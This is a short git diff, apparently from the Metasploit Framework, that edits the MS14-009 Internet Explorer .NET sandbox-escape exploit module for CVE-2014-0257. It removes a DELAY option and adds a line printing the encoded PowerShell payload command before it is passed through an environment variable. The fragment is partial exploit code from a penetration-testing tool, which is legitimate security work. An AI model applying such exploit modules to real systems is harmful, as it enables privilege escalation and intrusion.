diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index 00a4f22ff6..880dab9127 100755 Binary files a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll and b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll differ diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 84a0ea81a3..88f1f19176 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -64,11 +64,6 @@ class Metasploit3 < Msf::Exploit::Local ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] ] )) - - register_options( - [ - OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]) - ]) end def check @@ -156,6 +151,7 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + print_status cmd session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP')